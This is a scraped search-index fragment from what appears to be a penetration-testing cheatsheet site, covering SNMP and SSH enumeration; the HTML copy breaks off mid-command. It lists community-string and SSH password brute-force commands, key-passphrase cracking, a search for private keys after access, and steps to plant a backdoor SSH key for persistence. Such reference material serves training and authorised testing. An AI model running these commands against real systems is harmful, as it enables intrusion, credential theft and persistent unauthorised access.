manager community snmp cisco monitor 0 internal ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/snmp/","summary":"\u003ch1 id=\"snmp-enumeration-cheatsheet\"\u003eSNMP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 161 (UDP — queries), 162 (UDP — traps)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"snmp-versions\"\u003eSNMP Versions\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eVersion\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eAuth\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eNotes\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ev1\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCommunity string\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCleartext, oldest\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ev2c\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCommunity string\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCleartext, most common\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ev3\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUsername + auth + encryption\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSecure, rarely misconfigured\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan 
style=\"color:#ae81ff\"\u003e161\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"community-string-brute-force\"\u003eCommunity String Brute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# onesixtyone (fast UDP brute)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eonesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eonesixtyone -c community.txt -i ips.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-brute \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args 
snmp-brute.communitiesdb\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003ecommunities.txt \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/snmp/snmp_login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"snmpwalk--walking-the-mib-tree\"\u003esnmpwalk — Walking the MIB Tree\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full walk (v1/v2c)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v1 -c public \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Target specific OIDs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1         
\u003cspan style=\"color:#75715e\"\u003e# System info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.4.2    \u003cspan style=\"color:#75715e\"\u003e# Running processes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.6.3    \u003cspan style=\"color:#75715e\"\u003e# Installed software\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.6.13.1.3  \u003cspan style=\"color:#75715e\"\u003e# Open TCP ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.4.1.77.1.2.25 \u003cspan style=\"color:#75715e\"\u003e# Windows user accounts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.2.2        \u003cspan style=\"color:#75715e\"\u003e# Network interfaces\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SNMPv3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v3 -u \u0026lt;user\u0026gt; -l AuthPriv \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -a MD5 -A \u0026lt;authpass\u0026gt; -x DES -X \u0026lt;privpass\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 
id=\"snmpget--single-oid-query\"\u003esnmpget — Single OID Query\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.1.0     \u003cspan style=\"color:#75715e\"\u003e# sysDescr\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.5.0     \u003cspan style=\"color:#75715e\"\u003e# sysName (hostname)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.6.0     \u003cspan style=\"color:#75715e\"\u003e# sysLocation\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"snmp-check\"\u003esnmp-check\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmp-check \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmp-check \u0026lt;ip\u0026gt; -c public\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmp-check \u0026lt;ip\u0026gt; -c public -v 2c\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"braa--bulk-snmp\"\u003ebraa — Bulk SNMP\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebraa public@\u0026lt;ip\u0026gt;:.1.3.6.*\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebraa public@192.168.1.1-254:.1.3.6.1.2.1.1.1.0\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-snmp-scripts\"\u003eNmap SNMP Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-sysdescr \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-interfaces \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-processes \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-win32-users \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan 
style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-win32-services \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-win32-software \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-* \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-oids-reference\"\u003eKey OIDs Reference\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eOID\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.1.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSystem description\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.3.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSystem uptime\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.5.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHostname\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.6.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSystem location\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.25.1.6.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRunning OS processes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.25.4.2.1.2\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eProcess names\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.25.6.3.1.2\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInstalled 
packages\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.4.1.77.1.2.25\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWindows user accounts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.6.13.1.3\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTCP open ports\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.2.2.1.2\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInterface names\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.2.2.1.11\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInterface in-packets\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-community-strings\"\u003eCommon Community Strings\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003epublic     private     manager\ncommunity  snmp        cisco\nmonitor    0           internal\n\u003c/code\u003e\u003c/pre\u003e","title":"SNMP"},{"content":"SSH Enumeration Cheatsheet Default Port: 22 (TCP)\nBanner \u0026amp; Info Gathering nc -nv \u0026lt;ip\u0026gt; 22 # Banner grab ssh -v \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; # Verbose handshake output ssh -V # Local SSH client version # Nmap scripts nmap -p 22 -sV \u0026lt;ip\u0026gt; nmap -p 22 --script ssh-hostkey \u0026lt;ip\u0026gt; nmap -p 22 --script ssh2-enum-algos \u0026lt;ip\u0026gt; nmap -p 22 --script ssh-auth-methods \\ --script-args ssh.user=\u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; nmap -p 22 --script sshv1 \u0026lt;ip\u0026gt; # Check for insecure SSHv1 ssh-audit (Configuration Security Check) ssh-audit \u0026lt;ip\u0026gt; ssh-audit \u0026lt;ip\u0026gt; -p 22 # Flags to note: # [fail] = critical issue # [warn] = should be fixed # Lists: KEX, hostkey, encryption, MAC algorithms User Enumeration # CVE-2018-15473 (OpenSSH \u0026lt; 7.7 username enumeration) python3 ssh_user_enum.py --userList users.txt --ip 
\u0026lt;ip\u0026gt; # Metasploit use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS \u0026lt;ip\u0026gt; set USER_FILE users.txt run Brute Force # Hydra hydra -l \u0026lt;user\u0026gt; -P wordlist.txt ssh://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt ssh://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 2222 ssh://\u0026lt;ip\u0026gt; # Custom port # Medusa medusa -h \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -P wordlist.txt -M ssh # Nmap nmap -p 22 --script ssh-brute \u0026lt;ip\u0026gt; nmap -p 22 --script ssh-brute \\ --script-args userdb=users.txt,passdb=pass.txt \u0026lt;ip\u0026gt; # Metasploit use auxiliary/scanner/ssh/ssh_login set RHOSTS \u0026lt;ip\u0026gt; set USERNAME \u0026lt;user\u0026gt; set PASS_FILE wordlist.txt run Key-Based Attacks # Connect with private key ssh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; chmod 600 id_rsa \u0026amp;\u0026amp; ssh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; # Crack passphrase on private key ssh2john id_rsa \u0026gt; ssh_hash.txt john ssh_hash.txt --wordlist=wordlist.txt hashcat -m 22921 ssh_hash.txt wordlist.txt # Ed25519 hashcat -m 22911 ssh_hash.txt wordlist.txt # RSA # Scan for keys (key harvesting after initial access) find / -name \u0026#34;id_rsa\u0026#34; -o -name \u0026#34;id_ecdsa\u0026#34; -o -name \u0026#34;id_ed25519\u0026#34; 2\u0026gt;/dev/null find / -name \u0026#34;*.pem\u0026#34; -o -name \u0026#34;*.key\u0026#34; 2\u0026gt;/dev/null SSH Key Scanning # Collect host keys ssh-keyscan \u0026lt;ip\u0026gt; ssh-keyscan -t rsa,ecdsa,ed25519 \u0026lt;ip\u0026gt; ssh-keyscan -p 2222 \u0026lt;ip\u0026gt; # Scan range ssh-keyscan -f hosts.txt \u0026gt; known_hosts Interesting Files to Grab Post-Access ~/.ssh/id_rsa # Private key ~/.ssh/id_rsa.pub # Public key ~/.ssh/authorized_keys # Authorized keys (add yours for persistence) ~/.ssh/known_hosts # Previous connections (network map) /etc/ssh/sshd_config # Server configuration 
/etc/ssh/ssh_host_rsa_key # Host private key Add Backdoor SSH Key (Post-Exploitation) # On attacker machine ssh-keygen -t rsa -b 4096 -f backdoor # On target (append to authorized_keys) echo \u0026#34;ssh-rsa AAAA...\u0026#34; \u0026gt;\u0026gt; ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys # Connect back ssh -i backdoor \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; Common Misconfigurations to Check PermitRootLogin yes — Root login allowed PasswordAuthentication yes — Passwords accepted (brutable) PermitEmptyPasswords yes — Blank passwords allowed AuthorizedKeysFile .ssh/authorized_keys — Key auth path AllowUsers / DenyUsers — User restrictions Port 22 — Non-standard port may indicate stealth ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/ssh/","summary":"\u003ch1 id=\"ssh-enumeration-cheatsheet\"\u003eSSH Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 22 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner--info-gathering\"\u003eBanner \u0026amp; Info Gathering\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e                      \u003cspan style=\"color:#75715e\"\u003e# Banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -v \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;                  \u003cspan style=\"color:#75715e\"\u003e# Verbose handshake output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -V                               \u003cspan style=\"color:#75715e\"\u003e# Local SSH client 
version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-hostkey \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh2-enum-algos \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-auth-methods \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args ssh.user\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;user\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script sshv1 \u0026lt;ip\u0026gt;      \u003cspan style=\"color:#75715e\"\u003e# Check for insecure SSHv1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-audit-configuration-security-check\"\u003essh-audit (Configuration Security Check)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-audit \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-audit \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Flags to note:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# [fail] = critical issue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# [warn] = should be fixed\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Lists: KEX, hostkey, encryption, MAC algorithms\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"user-enumeration\"\u003eUser Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# CVE-2018-15473 (OpenSSH \u0026lt; 7.7 username enumeration)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 ssh_user_enum.py --userList users.txt --ip 
\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ssh/ssh_enumusers\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset USER_FILE users.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Hydra\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l 